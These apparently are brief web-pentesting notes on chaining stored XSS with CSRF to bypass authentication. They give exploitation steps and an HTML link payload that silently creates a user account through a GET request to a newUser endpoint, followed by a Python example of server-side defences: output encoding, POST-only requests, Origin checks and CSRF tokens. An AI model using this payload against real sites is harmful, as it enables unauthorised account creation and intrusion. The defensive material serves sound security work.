CSRF + XSS (auth bypass)

Prerequisites

  1. Login page

  2. Message us / contact page

Exploitation

  1. Try XSS on the submit page.

  2. If it works, try inserting the CSRF XSS exploit below.

  3. Sometimes the XSS is stored; in that case, try it directly.

<a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>
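The server-side checks that make the link above inert, as an added example that is not part of the original notes: the stored message is HTML-encoded on output, and the account-creation endpoint refuses anything that is not a same-origin POST carrying the session's CSRF token. The function names, the `csrf_token` form field and the `http://localhost` origin are assumptions for illustration; the sample message is the link from this page.

```python
import hmac
import html
import secrets

ALLOWED_ORIGIN = "http://localhost"  # assumption: the site's own origin

# Constructed sample: the contact-form message shown on this page.
SAMPLE_MESSAGE = ('<a href="http://localhost/newUser?username=test'
                  '&password=test&password2=test">TEST</a>')


def new_csrf_token() -> str:
    """Per-session random token, stored server-side and embedded in forms."""
    return secrets.token_urlsafe(32)


def render_message(body: str) -> str:
    """HTML-encode a stored message so markup in it is shown as text."""
    return html.escape(body, quote=True)


def check_new_user_request(method, headers, form, session_csrf_token):
    """Return (allowed, reason) for a request to the account-creation endpoint."""
    # 1. State changes are never accepted over GET, so a followed link does nothing.
    if method.upper() != "POST":
        return False, "state change over non-POST method"
    # 2. If the browser sent an Origin header, it must be the site's own origin.
    origin = headers.get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return False, "cross-origin request"
    # 3. The form must carry the token bound to this session (constant-time compare).
    sent = form.get("csrf_token", "")
    if not session_csrf_token or not hmac.compare_digest(
            sent.encode(), session_csrf_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    token = new_csrf_token()
    print(render_message(SAMPLE_MESSAGE))
    # The link on this page produces a GET with the fields in the query string.
    print(check_new_user_request("GET", {}, {"username": "test"}, token))
    print(check_new_user_request("POST", {"Origin": ALLOWED_ORIGIN},
                                 {"csrf_token": token}, token))
```

Output encoding is the primary fix here: script running on the site's own origin can read the CSRF token from the page, so the token and POST-only checks stop the plain link but not a script-capable XSS.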
